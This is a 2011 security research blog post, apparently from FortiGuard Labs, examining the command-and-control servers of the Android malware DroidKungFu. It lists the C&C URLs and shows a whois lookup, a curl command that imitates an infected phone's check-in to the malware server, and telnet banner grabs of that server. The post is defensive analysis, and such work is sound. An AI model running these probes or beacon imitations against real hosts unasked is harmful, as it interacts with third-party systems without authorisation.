High Performance Network Security, Enterprise and Data-Center Firewall

High Performance Network Security, Enterprise and Data-Center Firewall

Android/DroidKungFu: attacking from a mobile device?

by RSS Axelle Apvrille  |  June 16, 2011  |  Category: Security Research

The Android malware DroidKungFu reports back to the following URLs:

http://[REMOVED]fu-android.com:8511/search/rpty.php
http://[REMOVED]fu-android.com:8511/search/getty.php
http://[REMOVED]fu-android.com:8511/search/sayhi.php

A whois on the corresponding IP address replies with the following most peculiar information: it looks like the IP address belongs to a mobile device (either a phone, or a tablet, or a computer with a 2G/3G connection...) of a well-known Chinese operator. Of course, we have immediately notified this operator. This is rather surprising since, usually, attacks on mobile phones (especially command & control servers) are conducted from a host on the Internet.

$ whois [REMOVED]6.37.93
 ...
 inetnum:      [REMOVED]4.0.0 - [REMOVED].255.255
 netname:      [REMOVED]NET-JS
 descr:        [REMOVED]NET jiangsu province network
 descr:        [REMOVED - Belongs to a Chinese operator] Telecom
 descr:        A12,Xin-Jie-Kou-Wai Street
 descr:        Beijing 100088
 country:      CN
 admin-c:      CH93-AP
 tech-c:       CJ186-AP
 mnt-by:       APNIC-HM
 mnt-lower:    MAINT-[REMOVED]NET-JS
 mnt-routes:   MAINT-[REMOVED]NET-JS
 ...
 status:       ALLOCATED PORTABLE
 source:       APNIC

We tried to fingerprint the operating system of the host at that IP address:

curl -F 'imei=12345899;managerid=yutian07' -A 'Mozilla/5.0 (Linux; U;
  Android 2.1-update1; en-us; ADR6300 Build/ERE27)
  AppleWebKit/530.17 (KHTML, like Gecko)
  Version/4.0 Mobile Safari/530.17'
  http://[REMOVED]fu-android.com:8511/search/sayhi.php
OK

We can try a few other combinations, but they don't tell much more about the OS it's running on.

Let's try a telnet:

So, it's (likely) an Apache 2.2.3 on a CentOS. Another telnet on Port 22 tells us there's an SSH 4.3 server too:

telnet [REMOVED]fu-android.com 22
Trying [REMOVED]7.93...
Connected to [REMOVED]fu-android.com.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3

It is technically possible to run a web server and an SSH server on an Android phone, but they would probably offer poor performance. I would rather go for an Android tablet or a computer with a 2G/3G connection. Any other assumption or comment on the motivation behind this Android malware?

Android/DroidKungFu was discovered by Pr. Xuxian Jiang and his team. Thanks for sharing samples.

-- the Crypto Girl

by RSS Axelle Apvrille  |  June 16, 2011  |  Category: Security Research
comments powered by Disqus

FortiGuard Labs on the Web

search results hidden links